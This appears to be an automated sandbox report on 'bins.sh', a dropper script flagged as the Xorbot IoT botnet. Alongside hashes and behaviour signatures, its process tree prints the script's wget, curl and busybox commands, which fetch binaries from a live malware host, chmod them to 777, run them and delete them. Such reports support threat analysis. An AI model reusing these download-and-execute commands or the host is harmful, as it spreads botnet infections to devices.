Analysis

  • max time kernel
    144s
  • max time network
    152s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    29/11/2024, 14:01

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    de53efb865d2702c1ebba6a22269f29c

  • SHA1

    7ffba83c7e1bf358c188ed7187865e8f30e1a4a0

  • SHA256

    22acfc0d6e942b85d7dedb1649db01ef0e39aaac52709cb92a04e20e05789837

  • SHA512

    8071edb71dcf8223e60eb11b54ca7a7f9f256296f360d60819debadb6931412575b5aadd7211ef7a1f01b3467ef14b29b1fae1b845096f3f7095f684e4c77e6e

  • SSDEEP

    192:9drDtt03vb3atYsU4sgJ66msgJ66iwktt03vbRE/:9drDtt03z3aSsUe/tt03zRE/

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:696
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:701
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/j0o2nppKcvyMdefx68huu9x69xhxIXKtd2
          2⤵
          • System Network Configuration Discovery
          PID:703
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/j0o2nppKcvyMdefx68huu9x69xhxIXKtd2
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:709
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/j0o2nppKcvyMdefx68huu9x69xhxIXKtd2
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:726
        • /bin/chmod
          chmod 777 j0o2nppKcvyMdefx68huu9x69xhxIXKtd2
          2⤵
          • File and Directory Permissions Modification
          PID:728
        • /tmp/j0o2nppKcvyMdefx68huu9x69xhxIXKtd2
          ./j0o2nppKcvyMdefx68huu9x69xhxIXKtd2
          2⤵
          • Executes dropped EXE
          PID:729
        • /bin/rm
          rm j0o2nppKcvyMdefx68huu9x69xhxIXKtd2
          2⤵
            PID:731
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/p0PXvhHgHVw6z4yPmqDtjQIJCsljkmprx1
            2⤵
            • System Network Configuration Discovery
            PID:732
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/p0PXvhHgHVw6z4yPmqDtjQIJCsljkmprx1
            2⤵
            • Reads runtime system information
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:733
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/p0PXvhHgHVw6z4yPmqDtjQIJCsljkmprx1
            2⤵
            • System Network Configuration Discovery
            PID:813

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/j0o2nppKcvyMdefx68huu9x69xhxIXKtd2

          Filesize

          117KB

          MD5

          849fa04ef88a8e8de32cb2e8538de5fe

          SHA1

          c768af29fe4b6695fff1541623e8bbd1c6f242f7

          SHA256

          8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

          SHA512

          2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

        • /tmp/p0PXvhHgHVw6z4yPmqDtjQIJCsljkmprx1

          Filesize

          153B

          MD5

          998368d7c95ea4293237f2320546e440

          SHA1

          30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

          SHA256

          533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

          SHA512

          648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97